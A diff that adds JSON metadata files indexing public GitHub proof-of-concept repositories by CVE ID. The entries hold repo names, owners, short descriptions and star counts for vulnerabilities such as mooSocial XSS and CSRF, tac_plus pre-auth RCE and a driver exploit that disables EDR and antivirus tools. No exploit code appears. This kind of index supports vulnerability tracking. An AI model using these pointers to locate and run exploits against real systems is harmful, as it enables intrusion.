+ { + "id": 696867620, + "name": "CVE-2023-44811", + "full_name": "ahrixia\/CVE-2023-44811", + "owner": { + "login": "ahrixia", + "id": 35935843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4", + "html_url": "https:\/\/github.com\/ahrixia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahrixia\/CVE-2023-44811", + "description": "mooSocial v3.1.8 is vulnerable to Cross Site Request Forgery (CSRF) which allows attacker to change admin password.", + "fork": false, + "created_at": "2023-09-26T15:25:42Z", + "updated_at": "2024-08-12T20:32:48Z", + "pushed_at": "2023-10-07T01:31:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44812.json b/2023/CVE-2023-44812.json new file mode 100644 index 0000000000..17fefd3d8b --- /dev/null +++ b/2023/CVE-2023-44812.json @@ -0,0 +1,33 @@ +[ + { + "id": 696877711, + "name": "CVE-2023-44812", + "full_name": "ahrixia\/CVE-2023-44812", + "owner": { + "login": "ahrixia", + "id": 35935843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4", + "html_url": "https:\/\/github.com\/ahrixia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahrixia\/CVE-2023-44812", + "description": "mooSocial v3.1.8 is vulnerable to cross-site scripting on Admin redirect function.", + "fork": false, + "created_at": "2023-09-26T15:47:50Z", + "updated_at": "2024-08-12T20:32:48Z", + "pushed_at": "2023-10-07T01:32:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44813.json b/2023/CVE-2023-44813.json new file mode 100644 index 0000000000..b0ee8c4ad4 --- /dev/null +++ b/2023/CVE-2023-44813.json @@ -0,0 +1,33 @@ +[ + { + "id": 696890652, + "name": "CVE-2023-44813", + "full_name": "ahrixia\/CVE-2023-44813", + "owner": { + "login": "ahrixia", + "id": 35935843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4", + "html_url": "https:\/\/github.com\/ahrixia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahrixia\/CVE-2023-44813", + "description": "mooSocial v3.1.8 is vulnerable to cross-site scripting on Invite Friend function.", + "fork": false, + "created_at": "2023-09-26T16:16:46Z", + "updated_at": "2024-08-12T20:32:48Z", + "pushed_at": "2023-10-07T01:35:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44961.json b/2023/CVE-2023-44961.json new file mode 100644 index 0000000000..090cbb9221 --- /dev/null +++ b/2023/CVE-2023-44961.json @@ -0,0 +1,33 @@ +[ + { + "id": 700732996, + "name": "CVE-2023-44961", + "full_name": "ggb0n\/CVE-2023-44961", + "owner": { + "login": "ggb0n", + "id": 41365666, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41365666?v=4", + "html_url": "https:\/\/github.com\/ggb0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ggb0n\/CVE-2023-44961", + "description": "PoC for CVE-2023-44961", + "fork": false, + "created_at": "2023-10-05T07:27:45Z", + "updated_at": "2023-10-12T05:00:13Z", + "pushed_at": "2023-10-12T05:00:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": true, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44962.json b/2023/CVE-2023-44962.json new file mode 100644 index 0000000000..a578ec550a --- /dev/null +++ b/2023/CVE-2023-44962.json @@ -0,0 +1,33 @@ +[ + { + "id": 700738589, + "name": "CVE-2023-44962", + "full_name": "ggb0n\/CVE-2023-44962", + "owner": { + "login": "ggb0n", + "id": 41365666, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41365666?v=4", + "html_url": "https:\/\/github.com\/ggb0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ggb0n\/CVE-2023-44962", + "description": "PoC for CVE-2023-44962", + "fork": false, + "created_at": "2023-10-05T07:43:07Z", + "updated_at": "2023-12-03T18:02:25Z", + "pushed_at": "2023-10-11T04:58:41Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": true, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44976.json b/2023/CVE-2023-44976.json new file mode 100644 index 0000000000..fde42c005c --- /dev/null +++ b/2023/CVE-2023-44976.json @@ -0,0 +1,33 @@ +[ + { + "id": 699037101, + "name": "BadRentdrv2", + "full_name": "keowu\/BadRentdrv2", + "owner": { + "login": "keowu", + "id": 42323126, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42323126?v=4", + "html_url": "https:\/\/github.com\/keowu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/keowu\/BadRentdrv2", + "description": "A vulnerable driver exploited by me (BYOVD) that is capable of terminating several EDRs and antivirus software in the market, rendering them ineffective, working for both x32 and x64(CVE-2023-44976).", + "fork": false, + "created_at": "2023-10-01T18:24:38Z", + "updated_at": "2024-10-31T12:22:17Z", + "pushed_at": "2024-07-06T23:35:51Z", + "stargazers_count": 89, + "watchers_count": 89, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 89, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45158.json b/2023/CVE-2023-45158.json new file mode 100644 index 0000000000..ceb59b286f --- /dev/null +++ b/2023/CVE-2023-45158.json @@ -0,0 +1,33 @@ +[ + { + "id": 714422608, + "name": "CVE-2023-45158", + "full_name": "Evan-Zhangyf\/CVE-2023-45158", + "owner": { + "login": "Evan-Zhangyf", + "id": 53845683, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53845683?v=4", + "html_url": "https:\/\/github.com\/Evan-Zhangyf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Evan-Zhangyf\/CVE-2023-45158", + "description": null, + "fork": false, + "created_at": "2023-11-04T21:14:09Z", + "updated_at": "2023-12-02T11:51:12Z", + "pushed_at": "2023-11-04T21:22:24Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45182.json b/2023/CVE-2023-45182.json new file mode 100644 index 0000000000..df9582214f --- /dev/null +++ b/2023/CVE-2023-45182.json @@ -0,0 +1,33 @@ +[ + { + "id": 747276396, + "name": "CVE-2023-45182", + "full_name": "afine-com\/CVE-2023-45182", + "owner": { + "login": "afine-com", + "id": 105647610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4", + "html_url": "https:\/\/github.com\/afine-com", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afine-com\/CVE-2023-45182", + "description": "IBM i Access Client Solutions < 1.1.9.4 - Weak password encryption", + "fork": false, + "created_at": "2024-01-23T16:05:55Z", + "updated_at": "2024-01-23T16:08:21Z", + "pushed_at": "2024-01-26T10:42:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45184.json b/2023/CVE-2023-45184.json new file mode 100644 index 0000000000..1df61b5321 --- /dev/null +++ b/2023/CVE-2023-45184.json @@ -0,0 +1,33 @@ +[ + { + "id": 732046716, + "name": "CVE-2023-45184", + "full_name": "afine-com\/CVE-2023-45184", + "owner": { + "login": "afine-com", + "id": 105647610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4", + "html_url": "https:\/\/github.com\/afine-com", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afine-com\/CVE-2023-45184", + "description": "IBM i Access Client Solution < 1.1.9.4 - Local server broken access control.", + "fork": false, + "created_at": "2023-12-15T14:04:32Z", + "updated_at": "2023-12-15T14:06:24Z", + "pushed_at": "2024-01-26T10:49:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45185.json b/2023/CVE-2023-45185.json new file mode 100644 index 0000000000..2285cefe44 --- /dev/null +++ b/2023/CVE-2023-45185.json @@ -0,0 +1,33 @@ +[ + { + "id": 747714734, + "name": "CVE-2023-45185", + "full_name": "afine-com\/CVE-2023-45185", + "owner": { + "login": "afine-com", + "id": 105647610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4", + "html_url": "https:\/\/github.com\/afine-com", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afine-com\/CVE-2023-45185", + "description": "IBM i Access Client Solutions < 1.1.9.4 - Remote code execution via insecure deserialisation", + "fork": false, + "created_at": "2024-01-24T13:53:36Z", + "updated_at": "2024-01-24T13:53:37Z", + "pushed_at": "2024-01-24T13:55:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45239.json b/2023/CVE-2023-45239.json new file mode 100644 index 0000000000..a8b557ef05 --- /dev/null +++ b/2023/CVE-2023-45239.json @@ -0,0 +1,33 @@ +[ + { + "id": 793726017, + "name": "tac_plus-pre-auth-rce", + "full_name": "takeshixx\/tac_plus-pre-auth-rce", + "owner": { + "login": "takeshixx", + "id": 5837896, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837896?v=4", + "html_url": "https:\/\/github.com\/takeshixx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/takeshixx\/tac_plus-pre-auth-rce", + "description": "tac_plus Pre-Auth Remote Command Execution Vulnerability (CVE-2023-45239 & CVE-2023-48643)", + "fork": false, + "created_at": "2024-04-29T18:48:57Z", + "updated_at": "2024-05-17T08:41:48Z", + "pushed_at": "2024-05-16T09:08:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45280.json b/2023/CVE-2023-45280.json new file mode 100644 index 0000000000..06b256af09 --- /dev/null +++ b/2023/CVE-2023-45280.json @@ -0,0 +1,95 @@ +[ + { + "id": 786209539, + "name": "CVE-2023-45280-1", + "full_name": "miguelc49\/CVE-2023-45280-1", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-45280-1", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:45:21Z", + "updated_at": "2024-04-14T17:41:05Z", + "pushed_at": "2024-04-15T22:56:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786209568, + "name": "CVE-2023-45280-3", + "full_name": "miguelc49\/CVE-2023-45280-3", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-45280-3", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:45:27Z", + "updated_at": "2024-04-14T17:41:14Z", + "pushed_at": "2024-04-15T22:58:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786350916, + "name": "CVE-2023-45280-2", + "full_name": "miguelc49\/CVE-2023-45280-2", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-45280-2", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:22:00Z", + "updated_at": "2024-04-14T17:41:11Z", + "pushed_at": "2024-04-15T22:59:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45288.json b/2023/CVE-2023-45288.json new file mode 100644 index 0000000000..7c727a5ed2 --- /dev/null +++ b/2023/CVE-2023-45288.json @@ -0,0 +1,33 @@ +[ + { + "id": 785588887, + "name": "cont-flood-poc", + "full_name": "hex0punk\/cont-flood-poc", + "owner": { + "login": "hex0punk", + "id": 1915998, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1915998?v=4", + "html_url": "https:\/\/github.com\/hex0punk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hex0punk\/cont-flood-poc", + "description": "PoC for CVE-2023-45288, continuation flood vulnerability", + "fork": false, + "created_at": "2024-04-12T07:36:39Z", + "updated_at": "2024-10-23T22:50:22Z", + "pushed_at": "2024-04-16T03:01:52Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4542.json b/2023/CVE-2023-4542.json new file mode 100644 index 0000000000..44481ea3bf --- /dev/null +++ b/2023/CVE-2023-4542.json @@ -0,0 +1,33 @@ +[ + { + "id": 676402950, + "name": "CVE-2023-4542", + "full_name": "PumpkinBridge\/CVE-2023-4542", + "owner": { + "login": "PumpkinBridge", + "id": 139355470, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/139355470?v=4", + "html_url": "https:\/\/github.com\/PumpkinBridge", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PumpkinBridge\/CVE-2023-4542", + "description": null, + "fork": false, + "created_at": "2023-08-09T05:57:13Z", + "updated_at": "2024-08-21T01:54:05Z", + "pushed_at": "2024-08-21T01:53:27Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45471.json b/2023/CVE-2023-45471.json new file mode 100644 index 0000000000..702c8eeca0 --- /dev/null +++ b/2023/CVE-2023-45471.json @@ -0,0 +1,33 @@ +[ + { + "id": 704942565, + "name": "CVE-2023-45471", + "full_name": "mehdibelhajamor\/CVE-2023-45471", + "owner": { + "login": "mehdibelhajamor", + "id": 62826765, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62826765?v=4", + "html_url": "https:\/\/github.com\/mehdibelhajamor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mehdibelhajamor\/CVE-2023-45471", + "description": null, + "fork": false, + "created_at": "2023-10-14T15:20:37Z", + "updated_at": "2023-10-14T16:46:59Z", + "pushed_at": "2023-10-14T16:43:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4549.json b/2023/CVE-2023-4549.json new file mode 100644 index 0000000000..481162c7d4 --- /dev/null +++ b/2023/CVE-2023-4549.json @@ -0,0 +1,33 @@ +[ + { + "id": 695842595, + "name": "CVE-2023-4549", + "full_name": "b0marek\/CVE-2023-4549", + "owner": { + "login": "b0marek", + "id": 144051679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4", + "html_url": "https:\/\/github.com\/b0marek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-4549", + "description": "Repository for CVE-2023-4549 vulnerability. ", + "fork": false, + "created_at": "2023-09-24T11:57:46Z", + "updated_at": "2023-09-24T11:57:47Z", + "pushed_at": "2023-09-24T12:09:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45503.json b/2023/CVE-2023-45503.json new file mode 100644 index 0000000000..3f9d1e070c --- /dev/null +++ b/2023/CVE-2023-45503.json @@ -0,0 +1,33 @@ +[ + { + "id": 783460926, + "name": "CVE-2023-45503", + "full_name": "ally-petitt\/CVE-2023-45503", + "owner": { + "login": "ally-petitt", + "id": 76501220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76501220?v=4", + "html_url": "https:\/\/github.com\/ally-petitt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ally-petitt\/CVE-2023-45503", + "description": "CVE-2023-45503 Reference", + "fork": false, + "created_at": "2024-04-07T23:43:39Z", + "updated_at": "2024-04-11T22:53:45Z", + "pushed_at": "2024-04-11T22:53:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45540.json b/2023/CVE-2023-45540.json new file mode 100644 index 0000000000..049ace4eda --- /dev/null +++ b/2023/CVE-2023-45540.json @@ -0,0 +1,33 @@ +[ + { + "id": 701340984, + "name": "CVE-2023-45540", + "full_name": "soundarkutty\/CVE-2023-45540", + "owner": { + "login": "soundarkutty", + "id": 26168410, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26168410?v=4", + "html_url": "https:\/\/github.com\/soundarkutty", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/soundarkutty\/CVE-2023-45540", + "description": "CVE-2023-45540 Jorani Leave Management System v1.0.3 – HTML Injection", + "fork": false, + "created_at": "2023-10-06T12:43:54Z", + "updated_at": "2024-05-18T13:29:23Z", + "pushed_at": "2024-05-18T13:29:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45542.json b/2023/CVE-2023-45542.json new file mode 100644 index 0000000000..93de31bbb1 --- /dev/null +++ b/2023/CVE-2023-45542.json @@ -0,0 +1,33 @@ +[ + { + "id": 696796100, + "name": "CVE-2023-45542", + "full_name": "ahrixia\/CVE-2023-45542", + "owner": { + "login": "ahrixia", + "id": 35935843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4", + "html_url": "https:\/\/github.com\/ahrixia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahrixia\/CVE-2023-45542", + "description": "mooSocial v3.1.8 is vulnerable to cross-site scripting on search function.", + "fork": false, + "created_at": "2023-09-26T12:59:31Z", + "updated_at": "2024-08-12T20:32:48Z", + "pushed_at": "2023-10-14T04:47:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45657.json b/2023/CVE-2023-45657.json new file mode 100644 index 0000000000..527311f38f --- /dev/null +++ b/2023/CVE-2023-45657.json @@ -0,0 +1,33 @@ +[ + { + "id": 707670270, + "name": "CVE-2023-45657", + "full_name": "RandomRobbieBF\/CVE-2023-45657", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-45657", + "description": "Nexter <= 2.0.3 - Authenticated (Subscriber+) SQL Injection via 'to' and 'from'", + "fork": false, + "created_at": "2023-10-20T12:01:15Z", + "updated_at": "2024-08-12T20:32:54Z", + "pushed_at": "2023-10-20T12:20:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4568.json b/2023/CVE-2023-4568.json new file mode 100644 index 0000000000..47d26fa1d3 --- /dev/null +++ b/2023/CVE-2023-4568.json @@ -0,0 +1,40 @@ +[ + { + "id": 803424741, + "name": "CVE-2023-4568", + "full_name": "Cappricio-Securities\/CVE-2023-4568", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2023-4568", + "description": "PaperCut NG Unauthenticated XMLRPC Functionality", + "fork": false, + "created_at": "2024-05-20T17:41:47Z", + "updated_at": "2024-06-24T08:27:10Z", + "pushed_at": "2024-06-24T08:24:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-4568", + "papercut", + "pentesting", + "wapt", + "xmlrpc" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45777.json b/2023/CVE-2023-45777.json new file mode 100644 index 0000000000..ac84e375f1 --- /dev/null +++ b/2023/CVE-2023-45777.json @@ -0,0 +1,33 @@ +[ + { + "id": 745800831, + "name": "TheLastBundleMismatch", + "full_name": "michalbednarski\/TheLastBundleMismatch", + "owner": { + "login": "michalbednarski", + "id": 1826899, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1826899?v=4", + "html_url": "https:\/\/github.com\/michalbednarski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/michalbednarski\/TheLastBundleMismatch", + "description": "Writeup and exploit for CVE-2023-45777, bypass for Intent validation inside AccountManagerService on Android 13 despite \"Lazy Bundle\" mitigation", + "fork": false, + "created_at": "2024-01-20T07:14:06Z", + "updated_at": "2024-11-06T02:14:36Z", + "pushed_at": "2024-01-21T05:04:01Z", + "stargazers_count": 80, + "watchers_count": 80, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 80, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45779.json b/2023/CVE-2023-45779.json new file mode 100644 index 0000000000..dfb9335d31 --- /dev/null +++ b/2023/CVE-2023-45779.json @@ -0,0 +1,33 @@ +[ + { + "id": 748840559, + "name": "rtx-cve-2023-45779", + "full_name": "metaredteam\/rtx-cve-2023-45779", + "owner": { + "login": "metaredteam", + "id": 91286942, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91286942?v=4", + "html_url": "https:\/\/github.com\/metaredteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/metaredteam\/rtx-cve-2023-45779", + "description": "Proof-of-concept code for Android APEX key reuse vulnerability", + "fork": false, + "created_at": "2024-01-26T21:17:38Z", + "updated_at": "2024-11-25T16:32:46Z", + "pushed_at": "2024-01-31T19:33:59Z", + "stargazers_count": 83, + "watchers_count": 83, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 83, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45827.json b/2023/CVE-2023-45827.json new file mode 100644 index 0000000000..1cd7eda966 --- /dev/null +++ b/2023/CVE-2023-45827.json @@ -0,0 +1,33 @@ +[ + { + "id": 845349448, + "name": "CVE-2023-45827", + "full_name": "200101WhoAmI\/CVE-2023-45827", + "owner": { + "login": "200101WhoAmI", + "id": 176820518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176820518?v=4", + "html_url": "https:\/\/github.com\/200101WhoAmI", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/200101WhoAmI\/CVE-2023-45827", + "description": "pp", + "fork": false, + "created_at": "2024-08-21T04:40:33Z", + "updated_at": "2024-08-21T04:41:16Z", + "pushed_at": "2024-08-21T04:41:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45828.json b/2023/CVE-2023-45828.json new file mode 100644 index 0000000000..92ee0804e6 --- /dev/null +++ b/2023/CVE-2023-45828.json @@ -0,0 +1,33 @@ +[ + { + "id": 706068061, + "name": "CVE-2023-45828", + "full_name": "RandomRobbieBF\/CVE-2023-45828", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-45828", + "description": "RumbleTalk Live Group Chat <= 6.1.9 - Missing Authorization via handleRequest", + "fork": false, + "created_at": "2023-10-17T08:41:54Z", + "updated_at": "2024-08-12T20:32:54Z", + "pushed_at": "2023-10-17T08:58:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45857.json b/2023/CVE-2023-45857.json new file mode 100644 index 0000000000..a19d6a881c --- /dev/null +++ b/2023/CVE-2023-45857.json @@ -0,0 +1,95 @@ +[ + { + "id": 706677544, + "name": "CVE-2023-45857", + "full_name": "valentin-panov\/CVE-2023-45857", + "owner": { + "login": "valentin-panov", + "id": 63700910, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63700910?v=4", + "html_url": "https:\/\/github.com\/valentin-panov", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/valentin-panov\/CVE-2023-45857", + "description": null, + "fork": false, + "created_at": "2023-10-18T12:19:34Z", + "updated_at": "2023-10-18T19:25:42Z", + "pushed_at": "2023-10-19T15:20:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 710123753, + "name": "CVE-2023-45857-Demo", + "full_name": 